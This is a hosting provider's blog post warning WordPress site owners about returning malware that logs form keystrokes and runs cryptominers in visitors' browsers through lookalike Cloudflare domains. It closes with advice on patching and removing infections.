Towards the end of last year, thousands of WordPress sites were discovered to be infected with a nasty bit of malware that included a keylogger and cryptocurrency miner. The malware relied on a server located at the fake cloudflare.solutions domain, which was quickly taken down, stopping it from sending data to the people behind the attack.
But, it appears the same malware is back, infecting WordPress sites and communicating its payload via various new domains. It should be understood that the domains the malware is using have nothing to do with the real Cloudflare. Since the proliferation of top-level domains over the last few years, it’s straightforward for an attacker to register a domain similar to the existing domain of a prominent company. On a cursory glance, an inexperienced site owner is likely to overlook code using domains that they associate with a legitimate business whose services they may use.
At the time of writing, it appears that several thousand WordPress sites have been infected, so, if you use our Virtual Private Server or Dedicated Server hosting platform to host a WordPress site, it’s worth taking a moment to make sure that it isn’t infected.
The malware has two roles: firstly, it logs keystrokes entered into form fields on a WordPress site and, secondly, it loads cryptomining code in the browsers of site visitors.
The keylogger is dangerous, particularly on WordPress sites that ask users to enter identifying or otherwise sensitive data. Ordinarily, that type of data is encrypted as it travels over the web so that an eavesdropper can’t intercept it. But, in this case, the malicious code is part of the site itself and can access the data directly.
The cryptomining scripts can cause problems for site visitors. Cryptocurrencies are created by a process called mining, which is essentially running lots of hard math on a computer’s CPU or GPU. Once enough processing work is done, the miner gets a coin.
Because lots of computer power is needed to generate even a small number of coins, one solution is to distribute the work among lots of low-power computers, which is exactly what the cryptomining malware does. The attacker gains cryptocurrency without having to invest in expensive hardware to do the work. Cryptomining malware consumes resources, including power, which is not something any site owner should inflict on their users, especially those using mobile devices.
It’s not clear how the malware infects WordPress sites in the first place, but the usual suspects are probably to blame: outdated WordPress sites with known vulnerabilities that haven’t been patched. Keep your WordPress sites up-to-date, folks!
If your site is infected, the most certain and effective way to remove malware is to reinstall WordPress and restore files and the database from a recent backup you’re sure in uninfected. If that’s not an option for you, Sucuri has an excellent guide to removing malware from a hacked WordPress site.